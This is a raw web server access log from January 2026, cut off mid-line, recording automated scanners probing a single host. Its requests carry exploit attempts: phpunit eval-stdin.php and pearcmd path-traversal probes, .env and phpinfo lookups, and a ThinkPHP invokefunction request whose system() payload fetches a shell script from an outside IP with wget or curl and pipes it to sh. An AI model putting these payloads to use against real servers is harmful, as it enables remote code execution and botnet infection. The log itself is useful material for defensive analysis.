+[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:30 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:31 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:31 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:31 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:31 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:31 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:31 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:31 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:31 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:31 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:31 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:37:31 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 128.140.66.63] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:21:40:28 +0000] 404 - GET http 91.82.83.208 "/login.asp" [Client 95.214.55.246] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:21:41:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 185.247.137.106] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" +[17/Jan/2026:21:43:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:21:49:26 +0000] 200 - GET http 91.82.83.208 "/" [Client 202.175.253.234] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.1" "-" +[17/Jan/2026:21:57:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:22:00:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:22:05:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:22:22:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:22:24:13 +0000] 405 - POST http 91.82.83.208 "/" [Client 79.124.40.174] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:22:33:07 +0000] 404 - GET http 91.82.83.208 "/bins/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[17/Jan/2026:22:33:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:22:36:59 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.188] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:22:37:03 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.188] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:22:47:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:22:49:24 +0000] 400 - GET http localhost "-" [Client 204.76.203.215] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:22:51:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:22:55:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 185.242.226.106] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[17/Jan/2026:22:57:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:22:59:38 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:23:05:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:23:13:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:23:21:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 167.94.138.193] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Jan/2026:23:21:57 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.193] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:23:21:58 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:23:22:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.193] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:23:22:02 +0000] 404 - GET http 91.82.83.208 "/login" [Client 167.94.138.193] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Jan/2026:23:22:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.193] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:23:29:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[17/Jan/2026:23:31:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:23:31:37 +0000] 200 - GET http 91.82.83.208 "/" [Client 162.216.149.247] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[17/Jan/2026:23:39:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:23:44:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:23:45:10 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:23:56:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.128.26.151] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:00:01:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 65.49.1.52] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0" "-" +[18/Jan/2026:00:03:07 +0000] 404 - GET http 91.82.83.208 "/webui/" [Client 65.49.1.52] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78" "-" +[18/Jan/2026:00:03:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:00:05:03 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:00:05:46 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:00:05:58 +0000] 404 - GET http 91.82.83.208 "/geoserver/web/" [Client 65.49.1.52] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0" "-" +[18/Jan/2026:00:16:10 +0000] 200 - GET http www.profibot.direct.quickconnect.to "/" [Client 100.52.3.146] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[18/Jan/2026:00:22:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:00:24:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.55.246] [Length 568] [Gzip 1.86] "-" "-" +[18/Jan/2026:00:27:14 +0000] 404 - GET http 91.82.83.208 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[18/Jan/2026:00:30:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:00:31:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:00:35:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:00:42:37 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:00:43:31 +0000] 200 - GET http 91.82.83.208 "/" [Client 172.210.68.13] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[18/Jan/2026:00:51:18 +0000] 404 - GET http 91.82.83.208 "/developmentserver/metadatauploader" [Client 40.74.208.9] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[18/Jan/2026:00:53:31 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:00:59:37 +0000] 404 - GET http 91.82.83.208 "/hudson" [Client 74.249.129.4] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[18/Jan/2026:01:05:56 +0000] 404 - POST http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[18/Jan/2026:01:13:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.153.107.22] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[18/Jan/2026:01:16:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:01:18:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:01:29:05 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[18/Jan/2026:01:29:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:01:32:13 +0000] 400 - GET http 91.82.83.208 "/" [Client 45.79.211.97] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[18/Jan/2026:01:41:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:01:41:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:02:02:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.185.132.15] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:02:02:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.185.132.15] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:02:04:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:02:06:36 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%29%7Csh" [Client 192.159.99.95] [Length 0] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[18/Jan/2026:02:08:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:02:10:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:02:16:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:02:21:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 45.33.80.243] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[18/Jan/2026:02:24:37 +0000] 400 - GET http 91.82.83.208 "/page/style/index.css" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:02:26:28 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[18/Jan/2026:02:27:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 199.45.155.106] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[18/Jan/2026:02:27:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.106] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:02:27:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.106] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:02:27:47 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:02:27:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.106] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:02:27:59 +0000] 404 - GET http 91.82.83.208 "/login" [Client 199.45.155.106] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[18/Jan/2026:02:31:26 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:02:31:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:02:47:33 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "-" +[18/Jan/2026:02:47:33 +0000] 404 - GET http 91.82.83.208 "/api/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:35.0) Gecko/20100101 Firefox/35.0" "-" +[18/Jan/2026:02:47:33 +0000] 404 - GET http 91.82.83.208 "/backend/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36" "-" +[18/Jan/2026:02:47:33 +0000] 404 - GET http 91.82.83.208 "/admin/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091201 SUSE/3.5.6-1.1.1 Firefox/3.5.6" "-" +[18/Jan/2026:02:47:34 +0000] 404 - GET http 91.82.83.208 "/.env.example" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/536.26.14 (KHTML, like Gecko) Version/6.0.1 Safari/536.26.14" "-" +[18/Jan/2026:02:47:34 +0000] 404 - GET http 91.82.83.208 "/app_dev.php/_profiler/phpinfo" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.75 Safari/537.36" "-" +[18/Jan/2026:02:47:34 +0000] 200 - GET http 91.82.83.208 "/?phpinfo=-1" [Client 78.153.140.177] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/4.1.3 Safari/533.19.4" "-" +[18/Jan/2026:02:47:34 +0000] 200 - GET http 91.82.83.208 "/?url=.env" 